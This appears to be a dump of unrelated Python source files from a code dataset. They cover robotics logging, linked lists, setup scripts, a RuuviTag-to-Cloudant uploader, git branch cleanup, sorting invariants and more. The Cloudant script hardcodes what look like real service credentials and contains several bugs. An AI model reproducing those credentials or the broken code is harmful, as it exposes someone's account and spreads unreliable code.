# [self.chaser_position, self.chaser_velocity, self.arm_angles, self.arm_angular_rates, self.target_position, self.target_velocity, self.end_effector_position, self.end_effector_velocity, self.relative_position_body, self.relative_angle, self.end_effector_position_body, self.end_effector_velocity_body]
raw_total_state_log.append([Pi_red_x, Pi_red_y, Pi_red_theta, Pi_red_Vx, Pi_red_Vy, Pi_red_omega, shoulder_theta, elbow_theta, wrist_theta, shoulder_omega, elbow_omega, wrist_omega, Pi_black_x, Pi_black_y, Pi_black_theta, Pi_black_Vx, Pi_black_Vy, Pi_black_omega, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
# Check the reward function based off this state
environment.chaser_position = np.array([Pi_red_x, Pi_red_y, Pi_red_theta])
environment.chaser_velocity = np.array([Pi_red_Vx, Pi_red_Vy, Pi_red_omega])
environment.target_position = np.array([Pi_black_x, Pi_black_y, Pi_black_theta])
environment.target_velocity = np.array([Pi_black_Vx, Pi_black_Vy, Pi_black_omega])
environment.arm_angles = np.array([shoulder_theta, elbow_theta, wrist_theta])
environment.arm_angular_rates = np.array([shoulder_omega, elbow_omega, wrist_omega])
# Get environment to check for collisions
environment.update_end_effector_and_docking_locations()
environment.update_end_effector_location_body_frame()
environment.update_relative_pose_body_frame()
environment.check_collisions()
rewards_this_timestep = environment.reward_function(0)
# Only add rewards if we aren't done
if not are_we_done:
cumulative_rewards += rewards_this_timestep
if environment.is_done(): # If we are done, this was the last reward that we added
are_we_done = True
timestep_where_docking_occurred = i
cumulative_reward_log.append(cumulative_rewards)
action_log.append([deep_guidance_Ax, deep_guidance_Ay, deep_guidance_alpha_base, deep_guidance_alpha_shoulder, deep_guidance_alpha_elbow, deep_guidance_alpha_wrist])
# Render the episode
environment_file.render(np.asarray(raw_total_state_log), np.asarray(action_log), 0, np.asarray(cumulative_reward_log), 0, 0, 0, 0, 0, 1, log_filename.split('.')[0], '', time_log, timestep_where_docking_occurred)
print("Done!")
# Close the display
del environment
plt.close()
display.stop() |
23,472 | b7dc32f27f839a7f9ac537370bccdb49137f9258 | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def detectCycle(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
try:
# start from head, idx1 move one step each time, idx2 move two steps each time
idx1 = head.next
idx2 = head.next.next
while not idx1 == idx2:
idx1 = idx1.next
idx2 = idx2.next.next
idx3 = head
while not idx3 == idx2:
idx2 = idx2.next
idx3 = idx3.next
return idx3
except:
return None
|
23,473 | 3d28c8dca08b31273ea8a0cc942a79fc80e58640 |
user = 8
def getMonthName(user):
months = [[1,'January'],
[2,'February'],
[3,'March'],
[4,'April'],
[5,'May'],
[6,'June'],
[7,'July'],
[8,'August'],
[9,'September'],
[10,'October'],
[11,'November'],
[12,'December']]
for i in range(len(months)):
if months[i][0] == user:
return months[i][1]
res = getMonthName(user)
print(res) |
23,474 | 3cdc17fb082de0378475442b6ebeae9bcdfe3cd2 | from setuptools import setup, find_packages
setup(
name='aquacrop_fd',
version='0.3.5',
description='AquaCrop wrapper',
url='https://github.com/DHI-GRAS/aquacrop-fd',
author='Jonas Solvsteen',
author_email='josl@dhigroup.com',
entry_points="""
[console_scripts]
aquacrop-run=aquacrop_fd.scripts.cli:run_cli
aquacrop-queues=aquacrop_fd.scripts.cli:run_queues
""",
install_requires=[
'numpy',
'xarray',
'rasterio',
'pandas',
'affine',
'click',
'scipy',
'dask',
'netcdf4',
'python-dateutil',
'marshmallow==3.0.0rc1',
'requests'
],
extras_require={
'test': [
'pytest',
'pytest-cov',
'codecov',
'colorlog'
]
},
packages=find_packages(),
include_package_data=True
)
|
23,475 | bf332d4d5b38774d2b52c721d02d003ca0cfc815 | """
Press Ctrl+C to quit.
2017-02-02 13:45:25.233400
Sensor - F4:A5:74:89:16:57
Temperature: 10
Humidity: 28
Pressure: 689
"""
# RuuviTag Libraries
import os
from datetime import datetime
from ruuvitag_sensor.ruuvi import RuuviTagSensor
# Cloudant Libraries
from cloudant.client import Cloudant
from cloudant.error import CloudantException
from cloudant.result import Result, ResultByKey
# Sleep
from time import sleep
# Cloudant Credentials
serviceUsername = "25656ee7-7379-47cd-9ba0-7180a1a2495e-bluemix"
servicePassword = "ea29328064d8eae35cb8b1adc153c9e284f4de9422ddba89a1014a60f5dabe67"
serviceURL = "https://25656ee7-7379-47cd-9ba0-7180a1a2495e-bluemix:ea29328064d8eae35cb8b1adc153c9e284f4de9422ddba89a1014a60f5dabe67@25656ee7-7379-47cd-9ba0-7180a1a2495e-bluemix.cloudantnosqldb.appdomain.cloud"
# RuuviTag Beacon mac
mac = 'F7:36:31:B2:5F:F9'
# RuuviTag Global variables
line_sen = ""
line_tem = ""
line_hum = ""
line_pre = ""
# Db Name
databaseName = "dbRuuviTag"
# RuuviTag Begings to Scan
print('Starting')
def print_data(received_data):
Sleep(1)
received_mac = received_data[0]
data = received_data[1]
# Save Data in variables
line_sen = str.format('Sensor - {0}', received_mac)
line_tem = str.format('Temperature: {0} C', data['temperature'])
line_hum = str.format('Humidity: {0}', data['humidity'])
line_pre = str.format('Pressure: {0}', data['pressure'])
# Clear screen and print sensor data
os.system('clear')
print('Press Ctrl+C to quit.\n\r')
print('Team Bravers \n\r\n\r')
print(str(datetime.now()))
print(line_sen)
print(line_tem)
print(line_hum)
print(line_pre)
print('\n\r\n\r.......')
# 3. Almacenar una pequena coleccion de datos como documentos dentro de la base de datos
# Crear documentos utilizando los datos de ejemplo.
# Examinar cada fila de la matriz para el documento en sampleData:
# Recuperar los campos de cada fila.
sensor = received_mac
temperature = data['temperature']
humidity = data['humidity']
pressure = document['pressure']
# Crear un documento JSON que represente todos
# los datos de la fila.
jsonDocument = {
"sensorMac": sensor,
"temp": temperature,
"hum": humidity,
"press": pressure
}
print(jsonDocument)
# Crear un documento utilizando la API de la base de datos.
newDocument = myDBeacon.create_document(jsonDocument)
# Comprobar que el documento existe en la base de datos.
if newDocument.exists():
print ("Document '{0}' successfully created.").format(number)
# Separar los resultados.
print ("----\n")
# 4. Recuperar una lista completa de documentos.
# Recuperación sencilla y mínima del primer
# documento de la base de datos.
result_collection = Result(myDBeacon.all_docs)
print ("Retrieved minimal document:\n{0}\n").format(result_collection[0])
# Recuperación sencilla y completa del primer
# documento de la base de datos.
result_collection = Result(myDBeacon.all_docs, include_docs=True)
print ("Retrieved full document:\n{0}\n").format(result_collection[0])
# Separar los resultados.
print ("----\n")
# Utilizar un punto final de API de IBM Cloudant para recuperar
# todos los documentos de la base de datos,
# incluido su contenido.
# Definir el punto final y los parámetros
end_point = '{0}/{1}'.format(serviceURL, databaseName + "/_all_docs")
params = {'include_docs': 'true'}
# Emitir la solicitud
response = client.r_session.get(end_point, params=params)
# Mostrar el contenido de la respuesta
print ("{0}\n").format(response.json())
# Separar los resultados.
print ("----\n")
# Todo finalizado.
# Ha llegado el momento de limpiar.
# 6. Cerrar la conexión con la instancia de servicio.
# Desconectar del servidor
client.disconnect()
# Finalizar la demo.
print ("===\n")
# Decir adiós.
exit()
# Use IBM librarie to create an IBM Cloudant client.
client = Cloudant(serviceUsername, servicePassword, url=serviceURL)
# Connect with server
client.connect()
# Create an DB instance.
dbRuuviTag = client.create_database(databaseName)
# Verify if db exists.
if dbRuuviTag.exists():
print ("'{0}' successfully create.\n".format(databaseName))
# Split Results.
print ("----\n")
RuuviTagSensor.get_datas(print_data, mac)
|
23,476 | bdf30f784e5f22860ef2b52a649508528b0d5a53 | from codecs import open
from os import path
import os
from setuptools import Extension, find_packages, setup
from sys import version_info
def file_content(fpath):
with open(path.join(here, fpath), encoding='utf-8') as f:
return f.read()
here = path.abspath(path.dirname(__file__))
# if WINDOWS
if os.name == 'nt':
import numpy
BOOST_LIBS = r'D:\boost_1_66_0_src\stage\lib'
BOOST_ROOT = r'D:\boost_1_66_0_src'
# there is need to copy the libboost_python3-vc141-mt-x64-1_66 file into boost_python3-vc141-mt-x64-1_66 file
lib_boost_py = BOOST_LIBS+r'\libboost_python3-vc141-mt-x64-1_66'
lib_boost_chrono = BOOST_LIBS+r'\libboost_chrono-vc141-mt-x64-1_66'
lib_boost_system = BOOST_LIBS+r'\libboost_system-vc141-mt-x64-1_66'
lib_boost_thread = BOOST_LIBS+r'\libboost_thread-vc141-mt-x64-1_66'
lib_other_boost_py = BOOST_LIBS+r'\boost_python3-vc141-mt-x64-1_66'
libraries = [lib_boost_py, lib_boost_chrono, lib_boost_system, lib_boost_thread, lib_other_boost_py]
include_dirs = ['include', numpy.get_include(), BOOST_ROOT]
else:
# if LINUX
lib_boost_py = 'boost_python-py%i%i' % version_info[:2]
lib_boost_chrono = 'boost_chrono'
lib_boost_system = 'boost_system'
lib_boost_thread = 'boost_thread'
libraries = [lib_boost_py, lib_boost_chrono, lib_boost_system, lib_boost_thread]
include_dirs = ['include']
setup(
name='voxel_map',
version='0.0.1',
description='Simple C++ header-only library with Matlab and Python interfaces for dealing with voxel maps.',
long_description=file_content('README.md'),
url='https://bitbucket.org/tpetricek/voxel_map',
author='Tomas Petricek',
author_email='tpetricek@gmail.com',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'Topic :: Software Development :: Build Tools',
'Topic :: Multimedia :: Graphics :: 3D Modeling',
'Topic :: Multimedia :: Graphics :: 3D Rendering',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
keywords='voxel map volumetric data',
packages=find_packages(),
install_requires=['numpy'],
ext_modules=[
Extension(
name='voxel_map',
sources=['python/voxel_map_module.cpp'],
include_dirs=include_dirs,
libraries=libraries,
extra_compile_args=['-fopenmp'],
extra_link_args=['-lgomp']
)
]
)
|
23,477 | d669e196d5dbef5322f95c63e78bbcd4aecd99e8 | try:
ExceptionGroup = ExceptionGroup
except NameError: # pragma: no cover
from exceptiongroup import ExceptionGroup # type: ignore # noqa: F401
|
23,478 | 9270546cad5cc08536a4538eb4ba2bf8e4e59108 | # Creating an Empty Hash Table
# Define a procedure, make_hashtable,
# that takes as input a number, nbuckets,
# and returns an empty hash table with
# nbuckets empty buckets.
def make_hashtable(nbuckets):
i=0
table = []
while i < nbuckets:
table.append([])
i = i + 1
return table
def make_hashtable2(nbuckets):
# doesnt work because each element refers to the same list
return [ [] ] * nbuckets
def make_hashtable3(nbuckets):
table = []
for e in range(0, nbuckets):
table.append([])
return table
assert make_hashtable(5) == make_hashtable2(5) # does not throw error
a = make_hashtable(5)
b = make_hashtable2(5)
assert a == b # no error
a[1].append([1])
b[1].append([1])
assert a == b # AssertionError
print(a)
print(b)
|
23,479 | e65a61524c7cad5580240b4a1c3a81ec08309112 | #20171656 유성현
#Week4 SoftWare Poject assignment4_1
#재귀함수를 이용하여 팩토리얼 코드를 짬
def factorial(n):
return 1 if n == 1 else factorial(n - 1) * n
upper = int(input("Enter a number: "))
while upper != -1:
if upper >= 0:
print(str(upper) + "! =", factorial(upper))
else:
print("양의 정수를 입력해주세요.")
upper = int(input("Enter a number: ")) |
23,480 | 98d1b9954b44fec1d611615d92723e697d5368e8 | """
Examples of invariants
"""
import math
# Invariants for loops
def iterative_factorial(num):
"""
Iterative method for computing factorial
"""
answer = 1
index = 0
assert answer == math.factorial(index)
while index < num:
index += 1
answer *= index
assert answer == math.factorial(index)
# note that index == num so answer = math.factorial(num)
return answer
def merge(list1, list2):
"""
Merge two sorted lists.
Returns a new sorted list containing all of the elements that
are in both list1 and list2.
This function can be iterative.
"""
answer = []
assert answer == sorted(answer)
idx1 = 0
idx2 = 0
while (idx1 < len(list1)) and (idx2 < len(list2)):
if list1[idx1] < list2[idx2]:
answer.append(list1[idx1])
idx1 += 1
elif list1[idx1] > list2[idx2]:
answer.append(list2[idx2])
idx2 += 1
else:
answer.append(list1[idx1])
answer.append(list2[idx2])
idx1 += 1
idx2 += 1
assert answer == sorted(answer)
answer.extend(list1[idx1:])
answer.extend(list2[idx2:])
assert answer == sorted(answer)
return answer
############################################
# Invariants for recursive functions
def recursive_factorial(num):
"""
Recursive definition of factorial
"""
if num == 0:
answer = 1
assert answer == math.factorial(num)
return answer
else:
rec_part = recursive_factorial(num - 1)
answer = num * rec_part
assert answer == math.factorial(num)
return answer
def merge_sort(list1):
"""
Sort the elements of list1.
Return a new sorted list with the same elements as list1.
This function should be recursive.
"""
if len(list1) <= 1:
answer = list(list1)
assert answer == sorted(answer)
return answer
mid = len(list1) // 2
list_low = merge_sort(list1[0:mid])
list_high = merge_sort(list1[mid:])
answer = merge(list_low, list_high)
assert answer == sorted(answer)
return answer
########################################################
# Class invariant
import poc_grid
import poc_queue
import poc_wildfire_gui
# constants
EMPTY = 0
FULL = 1
class WildFire(poc_grid.Grid):
"""
Class that models a burning wild fire using a grid and a queue
The grid stores whether a cell is burned (FULL) or unburned (EMPTY)
The queue stores the cells on the boundary of the fire
"""
def __init__(self, grid_height, grid_width):
"""
Override initializer for Grid, add queue to store boundary of fire
"""
poc_grid.Grid.__init__(self, grid_height, grid_width)
self._fire_boundary = poc_queue.Queue()
def clear(self):
"""
Set cells to be unburned and the fire boundary to be empty
"""
poc_grid.Grid.clear(self)
self._fire_boundary.clear()
def enqueue_boundary(self, row, col):
"""
Add cell with index (row, col) the boundary of the fire
"""
self._fire_boundary.enqueue((row, col))
def dequeue_boundary(self):
"""
Remove an element from the boundary of the fire
"""
return self._fire_boundary.dequeue()
def boundary_size(self):
"""
Return the size of the boundary of the fire
"""
return len(self._fire_boundary)
def fire_boundary(self):
"""
Generator for the boundary of the fire
"""
for cell in self._fire_boundary:
yield cell
# alternative syntax
#return (cell for cell in self._fire_boundary)
def update_boundary(self):
"""
Function that spreads the wild fire using one step of BFS
Updates both the cells and the fire_boundary
"""
cell = self._fire_boundary.dequeue()
neighbors = self.four_neighbors(cell[0], cell[1])
#neighbors = self.eight_neighbors(cell[0], cell[1])
for neighbor in neighbors:
if self.is_empty(neighbor[0], neighbor[1]):
self.set_full(neighbor[0], neighbor[1])
self._fire_boundary.enqueue(neighbor)
# Check class invariant after update
assert self.boundary_invariant()
def boundary_invariant(self):
"""
Class invariant that checks whether every cell on the
boundary also has the corresponding grid cell set to FULL
"""
for cell in self.fire_boundary():
if self.is_empty(cell[0], cell[1]):
print "Cell " + str(cell) + " in fire boundary is empty."
return False
return True
def run_examples():
"""
Run several examples
"""
print "iterative_factorial(4) is", iterative_factorial(4)
print "merge([1, 3, 5, 8], [2, 4, 10]) is", merge([1, 3, 5, 8], [2, 4, 10])
print "recursive_factorial(4) is", recursive_factorial(4)
print "merge_sort([4, 2, 1, 4, 6, 7, 2, 1]) is", merge_sort([4, 2, 1, 4, 6,
7, 2, 1])
# run gui to visualize wildfire
poc_wildfire_gui.run_gui(WildFire(30, 40))
run_examples()
|
23,481 | bcbc31866c5b86e916c127ee804518a6be045d62 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CS224N 2019-20: Homework 5
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
class CNN(nn.Module):
# Remember to delete the above 'pass' after your implementation
### YOUR CODE HERE for part 1g
'''
input_channel char_embedded
output_channel word_embedded
'''
def __init__(self,input_channel,output_channel,kernel_size=5,padding=1):
super(CNN,self).__init__()
self.input_channel=input_channel
self.output_channel=output_channel
self.kernel_size=kernel_size
self.padding=padding
self.conv=nn.Conv1d(self.input_channel,self.output_channel,self.kernel_size,padding=self.padding)
def forward(self,x):
X_conv=self.conv(x)
max_word_len=x.shape[-1]
max_pool=nn.MaxPool1d(max_word_len-self.kernel_size+2*self.padding+1)
X_conv_out=max_pool(F.relu(X_conv)).squeeze(-1)
return X_conv_out
### END YOUR CODE
|
23,482 | 4c33f6acd35486b95bac94e46e9480436d14a753 | #!/usr/bin/env python3
# Switch to default branch, pull, and deleted already merged branches. Branches
# are considered already merged, if they contain no commits not already present
# on the default branch, recent release branches, or any custom base branches
# manually specified with the --base flag.
#
# Example usages:
#
# gmp
# gmp --dry-run
# gmp --log=debug
# gmp --base=my-deployed-branch
import logging
import argparse
import subprocess
import sys
class CalledProcessError(subprocess.CalledProcessError):
def __str__(self):
out = self.stderr.strip()
if not out:
return "%s" % super()
else:
return "%s:\n\n%s" % (super(), out)
def sh(cmd: str, output=False) -> str:
"""Run the given command in shell mode, and return stdout and stderr
together as a string.
If output, then return string will be false, and output will not be
captured and instead be printed to stdout and stderr.
Raises CalledProcessError if command returned non-zero exit code.
"""
logging.debug(f"sh: {cmd}")
try:
res = subprocess.run(
cmd,
shell=True,
text=True,
capture_output=not output,
check=True,
)
except subprocess.CalledProcessError as exc:
raise CalledProcessError(**exc.__dict__) from None
out = str(res.stdout).removesuffix("\n")
return out
def base_branches() -> list[str]:
"""Return branches that should be used as bases to check for branches that
are already contained within them.
The first branch in the list is the default branch for the origin remote.
"""
branches = []
default = sh("git rev-parse --abbrev-ref origin/HEAD").removeprefix("origin/")
branches.append(default)
releases = sh(
"git branch --all --sort=-committerdate --list *release/* | head -10"
).splitlines()
releases = [b.removeprefix("*").strip() for b in releases]
branches.extend(releases)
return branches
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(description="Process some integers.")
parser.add_argument(
"-n",
"--dry-run",
action="store_true",
help="only print branches to delete",
)
parser.add_argument(
"--log",
default="info",
metavar="LEVEL",
help="log level",
)
parser.add_argument(
"-b",
"--base",
metavar="BRANCH",
nargs=1,
action="append",
help="additional base branches to use",
)
args = parser.parse_args()
return args
def main(args):
logging.basicConfig(
format="%(levelname)-6s %(message)-48s %(filename)s:%(lineno)d",
level=args.log.upper(),
)
bases = base_branches()
logging.debug(f"using base branches: {bases}")
if args.dry_run:
logging.info(f"switching to branch {bases[0]}")
logging.info("pulling from remote")
if not args.dry_run:
sh(f"git switch {bases[0]}", output=True)
sh(f"git pull --stat", output=True)
deleted = set()
for base in bases:
mergable = sh(f"git branch --merged {base}").splitlines()
mergable = [b.removeprefix("*").strip() for b in mergable]
mergable = [b for b in mergable if b not in bases]
for branch in mergable:
since = int(sh(f"git rev-list --count --no-merges {base}..{branch}"))
if since == 0 and branch not in deleted:
if args.dry_run:
logging.info(
f"deleting branch {branch} from {base.removeprefix('remotes/origin/')}",
extra={"foo": "bar"},
)
deleted.add(branch)
else:
sh(f"git branch -D {branch}", output=True)
return
if __name__ == "__main__":
args = parse_args()
try:
main(args)
except KeyboardInterrupt:
sys.exit(130)
|
23,483 | 818b8c7b13c79eb938e030dcd55688bf9c4f6bd9 | def gen_f(a, b): # Создаём функцию с двумя аргументами.
"""
Функция генератор простых чисел в дипазоне заданным 2мя аргументами чисел.
"""
if a < 2: # Отсекаем единицу, т.к. она не является простым числом.
a = 2
for i in range(a, b + 1): # Пробегаем все числа от a до b включительно.
for j in range(2, i): # Ищем делители среди списка чисел не превышающих делимое.
if i % j == 0: # Если делитель найден, число не простое.
break # Позволяет завершить выполнение внутреннего цикла и перейти к следующей итерации внешнего.
else:
yield i # Если делителей нет выводим число пользователю.
# Цикл вывода показаний генератора в одну строку через пробел.
for n in gen_f(1, 100):
print(n, end=' ')
|
23,484 | 271a564cf6e24805a5898a0f3e0140e6b750fac1 | import os
import re
import os.path as op
import numpy as np
import pandas as pd
import nibabel as nib
def locate_peaks(vox_coords):
"""Find most probable region in HarvardOxford Atlas of a vox coord."""
sub_names = harvard_oxford_sub_names
ctx_names = harvard_oxford_ctx_names
at_dir = op.join(os.environ["FSLDIR"], "data", "atlases")
ctx_data = nib.load(op.join(at_dir, "HarvardOxford",
"HarvardOxford-cort-prob-2mm.nii.gz")).get_data()
sub_data = nib.load(op.join(at_dir, "HarvardOxford",
"HarvardOxford-sub-prob-2mm.nii.gz")).get_data()
loc_list = []
for coord in vox_coords:
coord = tuple(coord)
ctx_index = np.argmax(ctx_data[coord])
ctx_prob = ctx_data[coord][ctx_index]
sub_index = np.argmax(sub_data[coord])
sub_prob = sub_data[coord][sub_index]
if not max(sub_prob, ctx_prob):
loc_list.append(("Unknown", 0))
continue
if not ctx_prob and sub_index in [0, 11]:
loc_list.append((sub_names[sub_index], sub_prob))
continue
if sub_prob > ctx_prob and sub_index not in [0, 1, 11, 12]:
loc_list.append((sub_names[sub_index], sub_prob))
continue
loc_list.append((ctx_names[ctx_index], ctx_prob))
return pd.DataFrame(loc_list, columns=["MaxProb Region", "Prob"])
def shorten_name(region_name, atlas):
"""Implement regexp sub for verbose Harvard Oxford Atlas region."""
sub_list = dict(ctx=harvard_oxford_ctx_subs,
sub=harvard_oxford_sub_subs)
for pat, rep in sub_list[atlas]:
region_name = re.sub(pat, rep, region_name).strip()
return region_name
def vox_to_mni(vox_coords):
"""Given ijk voxel coordinates, return xyz from image affine."""
try:
fsldir = os.environ["FSLDIR"]
except KeyError:
raise RuntimeError("vox_to_mni requires FSLDIR to be defined.")
mni_file = op.join(fsldir, "data/standard/avg152T1.nii.gz")
aff = nib.load(mni_file).get_affine()
mni_coords = np.zeros_like(vox_coords)
for i, coord in enumerate(vox_coords):
coord = coord.astype(float)
mni_coords[i] = np.dot(aff, np.r_[coord, 1])[:3].astype(int)
return mni_coords
harvard_oxford_sub_subs = [
("Left", "L"),
("Right", "R"),
("Cerebral Cortex", "Ctx"),
("Cerebral White Matter", "Cereb WM"),
("Lateral Ventrica*le*", "LatVent"),
]
harvard_oxford_ctx_subs = [
("Superior", "Sup"),
("Middle", "Mid"),
("Inferior", "Inf"),
("Lateral", "Lat"),
("Medial", "Med"),
("Frontal", "Front"),
("Parietal", "Par"),
("Temporal", "Temp"),
("Occipital", "Occ"),
("Cingulate", "Cing"),
("Cortex", "Ctx"),
("Gyrus", "G"),
("Sup Front G", "SFG"),
("Mid Front G", "MFG"),
("Inf Front G", "IFG"),
("Sup Temp G", "STG"),
("Mid Temp G", "MTG"),
("Inf Temp G", "ITG"),
("Parahippocampal", "Parahip"),
("Juxtapositional", "Juxt"),
("Intracalcarine", "Intracalc"),
("Supramarginal", "Supramarg"),
("Supracalcarine", "Supracalc"),
("Paracingulate", "Paracing"),
("Fusiform", "Fus"),
("Orbital", "Orb"),
("Opercul[ua][mr]", "Oper"),
("temporooccipital", "tempocc"),
("triangularis", "triang"),
("opercularis", "oper"),
("division", ""),
("par[st] *", ""),
("anterior", "ant"),
("posterior", "post"),
("superior", "sup"),
("inferior", "inf"),
(" +", " "),
("\(.+\)", ""),
]
harvard_oxford_sub_names = [
'L Cereb WM',
'L Ctx',
'L LatVent',
'L Thalamus',
'L Caudate',
'L Putamen',
'L Pallidum',
'Brain-Stem',
'L Hippocampus',
'L Amygdala',
'L Accumbens',
'R Cereb WM',
'R Ctx',
'R LatVent',
'R Thalamus',
'R Caudate',
'R Putamen',
'R Pallidum',
'R Hippocampus',
'R Amygdala',
'R Accumbens']
harvard_oxford_ctx_names = [
'Front Pole',
'Insular Ctx',
'SFG',
'MFG',
'IFG, triang',
'IFG, oper',
'Precentral G',
'Temp Pole',
'STG, ant',
'STG, post',
'MTG, ant',
'MTG, post',
'MTG, tempocc',
'ITG, ant',
'ITG, post',
'ITG, tempocc',
'Postcentral G',
'Sup Par Lobule',
'Supramarg G, ant',
'Supramarg G, post',
'Angular G',
'Lat Occ Ctx, sup',
'Lat Occ Ctx, inf',
'Intracalc Ctx',
'Front Med Ctx',
'Juxt Lobule Ctx',
'Subcallosal Ctx',
'Paracing G',
'Cing G, ant',
'Cing G, post',
'Precuneous Ctx',
'Cuneal Ctx',
'Front Orb Ctx',
'Parahip G, ant',
'Parahip G, post',
'Lingual G',
'Temp Fus Ctx, ant',
'Temp Fus Ctx, post',
'Temp Occ Fus Ctx',
'Occ Fus G',
'Front Oper Ctx',
'Central Oper Ctx',
'Par Oper Ctx',
'Planum Polare',
'Heschl"s G',
'Planum Tempe',
'Supracalc Ctx',
'Occ Pole']
|
23,485 | d3a03677a04afeb0dabb9669c2d49cfb1d0e501e | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Класс: Поиск разделителей в строке кода
"""
import re
class RubyOperations:
def __init__(self,code,cnt,flag):
self._code = code
self._cnt = cnt
self._flag = flag
@property
def findOperators(self):
""" Возвращает операторы в виде словаря, указанного в строке self._code """
dictionary={}
# шаблон поиска
ignore =["=>"]
phrases=[".eql?","equal?","=>"]
pattern=["===","**","==","+=","-=","*=","/=","**=","%=","!=",">=","<=","<=>",
".eql?","equal?","||","&&",">>","<<","^","!","~","<",">","=","+","-","*","/","%"]
patternCycle="(\s+not\s+)|(\s+and\s+)|(\s+or\s+)|(&&)|([|]+)|(\s*>\s*)"
# смотрим, чтобы это не был многострочный комментарий
if self._code.find("=begin")==0:
self._flag=True
return dictionary
# если многострочный комментарий окончился, снимаем флаг и делаем срез
if self._code.find("=end")==0 and self._flag:
self._flag=False
self._code=self._code[4:]
# если однострочный и с начала строки - игноррируем ее
indexSharp=self._code.find('#')
if indexSharp==0:
return dictionary
else:
# удаляем символы, которые не являются строками
for i in ignore:
while(self._code.find(i)!=-1):
index=self._code.find(i)
self._code=self._code[:index]+self._code[index+len(i):]
# поиск логических операторов
lst=re.findall(patternCycle,self._code)
for i in lst:
if len(i)!=0:
for j in i:
# проверим, чтобы оператор, как результат поиск не являлся ""
if len(j)!=0:
string=j
string=string.replace(" ","")
string=string.replace("=","")
dictionary[self._cnt]=string
self._cnt+=1
# поиск любых других операторов
for i in pattern:
block=self._code[:]
cntOp=block.count(i)
# кавычки (одинарные и двойные имеют один и тот же смысл)
quote = [i for (i, c) in enumerate(block) if c in '\'"']
# проходим по строке, пока не выделим нужные операторы
while(cntOp!=0):
NeedWrite=False
index=block.find(i)
# Анализ строки
# Шаг 1: проверим чтобы оператор не был в строке/кавычках
# считаем сколько кавычек до оператора
quotesCnt=0
for j in quote:
if j<index:
quotesCnt+=1
# затем рассматриваем как идет оператор с кавычками
if quotesCnt==0 or quotesCnt%2==0: NeedWrite=True # до/после кавычек
if quotesCnt%2==1: NeedWrite=False # в кавычках
# Шаг 2: вырезаем из текста оператор, если соотв. условиям выборки
string=""
start=end=0
findOp=afterWord=False
for j in range(len(block)):
if block[j] in pattern:
if findOp==False:
findOp=afterWord=True
start=j
string+=block[j]
if (block[j].isalpha() or block[j].isdecimal() or block[j]=="_" or block[j]==" ") and afterWord:
end=j
break
if findOp:
if i!=string: NeedWrite=False
# Шаг 3: запись в словарь
if NeedWrite:
dictionary[self._cnt]=i
self._cnt+=1
# Шаг 4: корректировка входных данных
# делаем срез, удаляя найденные элементы
block=block[:start]+block[end:]
# корректируем список с индексами
tmp=[]
for j in quote:
tmp.append(j-len(string))
quote=tmp
cntOp-=1
return dictionary
if __name__ == '__main__':
string="bar.add('cascade', ** 'menu' => += menu,'label=' === => hello)"
obj=RubyOperations(string,0,0)
print(obj.findOperators)
|
23,486 | 258f212eb7fa97871e558b060e66fb3a0a72cd4b | import requests
# Handling Python 2/3 quote_plus import
try:
from urllib.parse import quote_plus
except ImportError:
from urllib import quote_plus
class OpenGraphIO:
def __init__(self, options={}):
"""
Initialize OpenGraphIO instance with required app_id.
"""
# Throw an error if app_id is not present in options dict
if 'app_id' not in options:
raise KeyError('app_id must be supplied when making requests to the API. Get a free app_id by signing up here: https://www.opengraph.io/')
self.app_id = options['app_id']
# Assign options if present, or defaults if not
# These can be overridden when making requests through get_site_info
self.cache_ok = options['cache_ok'] if 'cache_ok' in options else True
self.full_render = options['full_render'] if 'full_render' in options else False
self.version = options['version'] if 'version' in options else '1.1'
def get_site_info_url(self, url, options={}):
"""
Build the request URL.
"""
version = options['version'] if 'version' in options else self.version
return 'https://opengraph.io/api/' + version + '/site/' + quote_plus(url)
def get_site_info_query_params(self, options={}):
"""
Set params for a particular request called with get_site_info.
"""
query_string_values = {}
query_string_values['app_id'] = options['app_id'] if 'app_id' in options else self.app_id
query_string_values['cache_ok'] = options['cache_ok'] if 'cache_ok' in options else self.cache_ok
query_string_values['full_render'] = options['full_render'] if 'full_render' in options else self.full_render
query_string_values['version'] = options['version'] if 'version' in options else self.version
return query_string_values
def get_site_info(self, passed_url, options={}):
"""
Request OpenGraph tags and return JSON.
"""
uri = self.get_site_info_url(passed_url)
params = self.get_site_info_query_params(options)
response = requests.get(uri, params)
return response.json()
|
23,487 | e7edf41ec353ba13a445d5b307a1fb8c31509d81 | import torch
def alpha_geodesic(
a: torch.Tensor,
b: torch.Tensor,
alpha: float,
lmd: float
) -> torch.Tensor:
r"""
$\alpha$-geodesic between two probability distributions
"""
a_ = a + 1e-12
b_ = b + 1e-12
if alpha == 1:
return torch.exp((1 - lmd) * torch.log(a_) + lmd * torch.log(b_))
elif alpha >= 1e+9:
return torch.min(a_, b_)
elif alpha <= -1e+9:
return torch.max(a_, b_)
else:
p = (1 - alpha) / 2
lhs = a_ ** p
rhs = b_ ** p
g = ((1 - lmd) * lhs + lmd * rhs) ** (1/p)
if alpha > 0 and (g == 0).sum() > 0:
return torch.min(a_, b_)
return g
|
23,488 | 6c4d79c4223ee31b0f5f636bdfd849c44c6d427f | socks = input()
socks = int(socks)
print(socks)
hash=[]
data = input().split(' ')
hash = data
print(hash)
|
23,489 | 303826166a1ddf566e97a7e680d03b60658179f1 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255, verbose_name='name')),
